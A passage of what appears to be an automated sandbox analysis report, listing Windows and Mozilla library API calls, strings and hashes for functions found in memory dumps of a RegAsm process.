                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0E2019
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                      • String ID: MOZ_CRASH()
                                                                                      • API String ID: 2055633661-2608361144
                                                                                      • Opcode ID: 356e3e0931bdbbb03eacc39ee1c9949d528fd0437064c68dfa3f27ff7ea65555
                                                                                      • Instruction ID: 70bf3525953dc6474f4d242c3a04059e302cdb400c7e8cd7926ef526e09fa922
                                                                                      • Opcode Fuzzy Hash: 356e3e0931bdbbb03eacc39ee1c9949d528fd0437064c68dfa3f27ff7ea65555
                                                                                      • Instruction Fuzzy Hash: C641CF71B052258FDB008F6ACC88B6ABBF5EF4D348F010135F9049BB41DB719905ABD1
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6C146009
                                                                                      • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C146024
                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C0EEE51,?), ref: 6C146046
                                                                                      • OutputDebugStringA.KERNEL32(?,6C0EEE51,?), ref: 6C146061
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C146069
                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C146073
                                                                                      • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C146082
                                                                                      • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C16148E), ref: 6C146091
                                                                                      • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C0EEE51,00000000,?), ref: 6C1460BA
                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C1460C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                      • String ID:
                                                                                      • API String ID: 3835517998-0
                                                                                      • Opcode ID: 42aedae052111a87be2786cb9b86717a33bb39778a813a040f38e6422921fbeb
                                                                                      • Instruction ID: 7058454179e345cd90cc882e12ee0dd3f995151e1f57c762b5cd26f542ef2ceb
                                                                                      • Opcode Fuzzy Hash: 42aedae052111a87be2786cb9b86717a33bb39778a813a040f38e6422921fbeb
                                                                                      • Instruction Fuzzy Hash: ED21A1B1A002089FDB105F25DC49BAA7BB8FF45218F0084A9F85A97640CB74E959DFE1
                                                                                      APIs
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C130039
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C130041
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C130075
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C130082
                                                                                      • moz_xmalloc.MOZGLUE(00000048), ref: 6C130090
                                                                                      • free.MOZGLUE(?), ref: 6C130104
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C13011B
                                                                                      Strings
                                                                                      • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C13005B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                      • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                      • API String ID: 3012294017-637075127
                                                                                      • Opcode ID: a4a63601bd6a7c0f9fbd0bcb2467317e2c1eff60f95ee6442dbd6acfcdf29925
                                                                                      • Instruction ID: c45e9adf963686082d8e9485368faeaaa42c3aceb1bf9431824360195cab7a79
                                                                                      • Opcode Fuzzy Hash: a4a63601bd6a7c0f9fbd0bcb2467317e2c1eff60f95ee6442dbd6acfcdf29925
                                                                                      • Instruction Fuzzy Hash: 1C41A0B5600254DFCB10CF25C844AAABBF1FF4A318F40452DE99A83B40D735E819DB91
                                                                                      APIs
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0F7EA7
                                                                                      • malloc.MOZGLUE(00000001), ref: 6C0F7EB3
                                                                                        • Part of subcall function 6C0FCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0FCB49
                                                                                        • Part of subcall function 6C0FCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0FCBB6
                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C0F7EC4
                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C0F7F19
                                                                                      • malloc.MOZGLUE(?), ref: 6C0F7F36
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0F7F4D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                      • String ID: d
                                                                                      • API String ID: 204725295-2564639436
                                                                                      • Opcode ID: 5721eaa411083c01c3d49a6527695d5032fbd5ba0d93b173259428d70133579a
                                                                                      • Instruction ID: ccec52af8ae7efab352d179aaee1a90080ce44c4afc27062c5f2da49d9ed36a7
                                                                                      • Opcode Fuzzy Hash: 5721eaa411083c01c3d49a6527695d5032fbd5ba0d93b173259428d70133579a
                                                                                      • Instruction Fuzzy Hash: 0A310CA1E0438897EB019B69CC046FEB7B8EF95208F459329EC5557712FB30E6D9C391
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C0F3EEE
                                                                                      • RtlFreeHeap.NTDLL ref: 6C0F3FDC
                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C0F4006
                                                                                      • RtlFreeHeap.NTDLL ref: 6C0F40A1
                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F40AF
                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F40C2
                                                                                      • RtlFreeHeap.NTDLL ref: 6C0F4134
                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F4143
                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C0F3CCC), ref: 6C0F4157
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Heap$StringUnicode$Allocate
                                                                                      • String ID:
                                                                                      • API String ID: 3680524765-0
                                                                                      • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                      • Instruction ID: 496aaa252f5f227d43e04e88a89a26163ecf5c2514adda77a3ae378c69548783
                                                                                      • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                      • Instruction Fuzzy Hash: 79A19BB1A00215DFEB40CF68C98075AB7F5BF48318F6541A9DD29AF702D771E886CBA0
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,6C103F47,?,?,?,6C103F47,6C101A70,?), ref: 6C0E207F
                                                                                      • memset.VCRUNTIME140(?,000000E5,6C103F47,?,6C103F47,6C101A70,?), ref: 6C0E20DD
                                                                                      • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C103F47,6C101A70,?), ref: 6C0E211A
                                                                                      • EnterCriticalSection.KERNEL32(6C16E744,?,6C103F47,6C101A70,?), ref: 6C0E2145
                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C103F47,6C101A70,?), ref: 6C0E21BA
                                                                                      • EnterCriticalSection.KERNEL32(6C16E744,?,6C103F47,6C101A70,?), ref: 6C0E21E0
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E744,?,6C103F47,6C101A70,?), ref: 6C0E2232
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                      • API String ID: 889484744-884734703
                                                                                      • Opcode ID: 127ed61a5438f152c35283bafcaba3cdbb127e09d9b256846134aa6475298088
                                                                                      • Instruction ID: 53f66c8e9d4b58ad11317ad6de1cf4e06ceded22ad0f3783cb7e461421725412
                                                                                      • Opcode Fuzzy Hash: 127ed61a5438f152c35283bafcaba3cdbb127e09d9b256846134aa6475298088
                                                                                      • Instruction Fuzzy Hash: E361E232F412168FCB04CE69CD88B7E77F1AF89318F294279E624A7A94D7709900DA81
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C12483A,?), ref: 6C0E4ACB
                                                                                      • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C12483A,?), ref: 6C0E4AE0
                                                                                      • moz_xmalloc.MOZGLUE(FFFE15BF,?,6C12483A,?), ref: 6C0E4A82
                                                                                        • Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2
                                                                                      • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C12483A,?), ref: 6C0E4A97
                                                                                      • moz_xmalloc.MOZGLUE(15D4E801,?,6C12483A,?), ref: 6C0E4A35
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C12483A,?), ref: 6C0E4A4A
                                                                                      • moz_xmalloc.MOZGLUE(15D4E824,?,6C12483A,?), ref: 6C0E4AF4
                                                                                      • moz_xmalloc.MOZGLUE(FFFE15E2,?,6C12483A,?), ref: 6C0E4B10
                                                                                      • moz_xmalloc.MOZGLUE(8E8E0022,?,6C12483A,?), ref: 6C0E4B2C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                      • String ID:
                                                                                      • API String ID: 4251373892-0
                                                                                      • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                      • Instruction ID: 3cebae3bb5eb0a7cd5524b046f69c57c52bd0ad0b8918065744b1a6f6a1038c7
                                                                                      • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                      • Instruction Fuzzy Hash: AF7169B19007069FCB54DFA8C480AAAB7F4FF08318B54863EE15A9BB41E731F655CB80
                                                                                      APIs
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C138273), ref: 6C139D65
                                                                                      • free.MOZGLUE(6C138273,?), ref: 6C139D7C
                                                                                      • free.MOZGLUE(?,?), ref: 6C139D92
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C139E0F
                                                                                      • free.MOZGLUE(6C13946B,?,?), ref: 6C139E24
                                                                                      • free.MOZGLUE(?,?,?), ref: 6C139E3A
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C139EC8
                                                                                      • free.MOZGLUE(6C13946B,?,?,?), ref: 6C139EDF
                                                                                      • free.MOZGLUE(?,?,?,?), ref: 6C139EF5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                      • String ID:
                                                                                      • API String ID: 956590011-0
                                                                                      • Opcode ID: e0965e22131800c05d95413003a619698a4a4fb386a8ba182a3f46c4f8c5e15a
                                                                                      • Instruction ID: 336c0d0500a570001f6b8fce8807b0a009361ca9665b6071cde8df92b9764179
                                                                                      • Opcode Fuzzy Hash: e0965e22131800c05d95413003a619698a4a4fb386a8ba182a3f46c4f8c5e15a
                                                                                      • Instruction Fuzzy Hash: 80718EB0909B518BD712CF18C49065BF3F5FF99319B449669E89E5BB02EF30E885CB81
                                                                                      APIs
                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C13DDCF
                                                                                        • Part of subcall function 6C11FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11FA4B
                                                                                        • Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C1390FF
                                                                                        • Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C139108
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DE0D
                                                                                      • free.MOZGLUE(00000000), ref: 6C13DE41
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DE5F
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DEA3
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C13DEE9
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C12DEFD,?,6C0F4A68), ref: 6C13DF32
                                                                                        • Part of subcall function 6C13DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DB86
                                                                                        • Part of subcall function 6C13DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DC0E
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C12DEFD,?,6C0F4A68), ref: 6C13DF65
                                                                                      • free.MOZGLUE(?), ref: 6C13DF80
                                                                                        • Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
                                                                                        • Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
                                                                                        • Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                      • String ID:
                                                                                      • API String ID: 112305417-0
                                                                                      • Opcode ID: 9699d572d1ccbf526ab660502866028a6e76fef9b64a83eefbadab3b1cf9a0ec
                                                                                      • Instruction ID: 13ef22f20d84c6414c2a562b6f4c8eb529b7d4cb7669edce53ecb422e7d56472
                                                                                      • Opcode Fuzzy Hash: 9699d572d1ccbf526ab660502866028a6e76fef9b64a83eefbadab3b1cf9a0ec
                                                                                      • Instruction Fuzzy Hash: C451F8767116209BD711AB28C8803AEB776BFA130CF96112DD95E53B41DB31F81ACB82
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13ABB4
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C0F4A63), ref: 6C13ABC0
                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6C13AC06
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13AC16
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13AC27
                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6C13AC66
                                                                                      • free.MOZGLUE(?), ref: 6C13AD19
                                                                                      • free.MOZGLUE(00000000), ref: 6C13AD2B
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6C13AD38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
                                                                                      • String ID:
                                                                                      • API String ID: 2167474191-0
                                                                                      • Opcode ID: b1a8878dba343e284ffe62d2040619292806b4f35418e91a55c07262fb90a7fa
                                                                                      • Instruction ID: 2d7a213768657ca225c51b539cc9e72beca9d4a7f97ee9b663d2c4d5c1e4b79f
                                                                                      • Opcode Fuzzy Hash: b1a8878dba343e284ffe62d2040619292806b4f35418e91a55c07262fb90a7fa
                                                                                      • Instruction Fuzzy Hash: 6D514974600B018FCB24DF65C488766B7F5FF89718F205A2DE4AA87B50DB31B848CB51
                                                                                      APIs
                                                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CB52
                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CB82
                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CB8D
                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CBA4
                                                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CBC4
                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CBE9
                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C13CBFB
                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CC20
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C13CC65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                      • String ID:
                                                                                      • API String ID: 2325513730-0
                                                                                      • Opcode ID: 93c08a8244e2dd8cb7ed7d336220a96f8b0d1671aeab95a10c0a12b8bd39b6d5
                                                                                      • Instruction ID: 1f92290070d56ad2a57cf4940b55425bd2a974551e9d5b01d933f16bfd7751d7
                                                                                      • Opcode Fuzzy Hash: 93c08a8244e2dd8cb7ed7d336220a96f8b0d1671aeab95a10c0a12b8bd39b6d5
                                                                                      • Instruction Fuzzy Hash: DC4192717003248FCB00EF65C8A8AAD77B5FF99358F044168E5199B751DB35EC05DBA1
                                                                                      APIs
                                                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D32
                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D62
                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D6D
                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145D84
                                                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145DA4
                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145DC9
                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C145DDB
                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145E00
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C145C8C,?,6C11E829), ref: 6C145E45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
